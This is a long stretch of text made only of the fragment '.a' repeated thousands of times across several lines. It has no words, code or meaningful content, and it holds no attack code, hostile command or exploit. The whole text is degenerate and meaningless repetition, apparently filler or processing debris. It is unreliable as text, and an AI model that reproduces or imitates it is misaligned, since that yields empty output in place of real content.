a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.